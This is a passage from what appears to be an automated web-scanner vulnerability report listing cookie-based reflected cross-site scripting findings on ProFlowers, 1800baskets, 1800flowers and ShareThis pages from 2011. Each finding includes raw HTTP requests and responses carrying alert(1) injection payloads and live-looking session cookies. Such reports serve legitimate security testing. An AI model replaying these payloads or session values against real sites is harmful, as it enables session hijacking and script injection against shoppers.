Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:29:34 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:34 GMT
Content-Length: 141286


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30003767;5519;42864;30050137;";
resx.itemid = "30003767";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5b716<script>alert(1)</script>eaf91aadd9b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 01:18:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b
userid:
</div>
...[SNIP]...

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c266'-alert(1)-'ef80968ac09 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:19:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83754


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a76bd'-alert(1)-'3d6fc46faa6e9ceca was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&landing=&cm_cid=&sku=93260&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&productType=GPT&locationCode=1&deliveryDate=Friday%2C+May.+20th&deliveryMonth=5&deliveryDay=20&deliveryYear=2011&baseCode=93260&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:29:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XUNWu9J-txAe1nRFBC2FfiX:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2533'-alert(1)-'2e3adfed67e was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:20:34 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31975


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8869'-alert(1)-'6549178ccfff42aec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=PayPalCheckout&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexOption=&cartItem%280%29.zip=10010&cartItem%280%29.international=false&cartItem%280%29.deliveryMonth=5&cartItem%280%29.deliveryDay=19&cartItem%280%29.deliveryYear=2011&cartItem%280%29.deliveryDate=Thursday%2C+May+19%2C+2011&cartItem%280%29.quantity=1&cartItem%281%29.type=0&cartItem%281%29.itemId=13c7607a-55cd-4ea1-aee4-94efa0d7dd24&cartItem%281%29.groupId=1&cartItem%281%29.flexOption=&cartItem%281%29.zip=10010&cartItem%281%29.international=false&cartItem%281%29.deliveryMonth=5&cartItem%281%29.deliveryDay=20&cartItem%281%29.deliveryYear=2011&cartItem%281%29.deliveryDate=Friday%2C+May+20%2C+2011&cartItem%281%29.quantity=1&groupSize=2&cartItemsCount=2 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f8869'-alert(1)-'6549178ccfff42aec; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.3.10.1304903358; CoreAt=90074784=1|3|0|0|0|2|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903463520&t2=-1&t3=1304903467089&t4=1304903461973&lti=1304903467089&ln=&hr=javascript%3AsetEvent%28PayPalCheckout%2CshoppingBasketForm%29&fti=1304903467576&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=18B%3Ao-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:50:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f8869'-alert(1)-'6549178ccfff42aec');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd3a'-alert(1)-'94ea47eb64a was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6182cd3a'-alert(1)-'94ea47eb64a; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:14 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37911


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6182cd3a'-alert(1)-'94ea47eb64a');

lpAddVars('page','pageid','template');

//-->
...[SNIP]...

4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 122aa'-alert(1)-'c02ab8e5310a2d560 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collection.do?dataset=10305&zipCode=10010&deliveryDate=May+19%2C+2011&locationType=1&actionEvent=filterCollection&isModalAllowed=1&deliveryDateFlag=N&deliveryMonth=05&deliveryDay=19&deliveryYear=2011&actionType=model HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618122aa'-alert(1)-'c02ab8e5310a2d560; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.2.10.1304902847; CoreAt=90074784=1|2|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902870973&t2=1304902875196&t3=1304902892073&t4=1304902867488&lti=1304902892072&ln=&hr=javascript%3AcheckNSubmitGNavModal%28filterCollection%2CguidedModelForm%29%3B&fti=1304902892082&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3BguidedCollectionForm%3A4%3B&ac=4:S&fd=4%3A0%3AzipCode%3B4%3A2%3AlocationType%3B&uer=&fu=/collection.do%3Fdataset%3D10305&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:12:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vdu2LusLHzfzpj67jImzBl4:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 74739


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618122aa'-alert(1)-'c02ab8e5310a2d560');

lpAddVars('page','pageid','collection');

//-->
...[SNIP]...

4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30d7'-alert(1)-'2e0123800e7 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

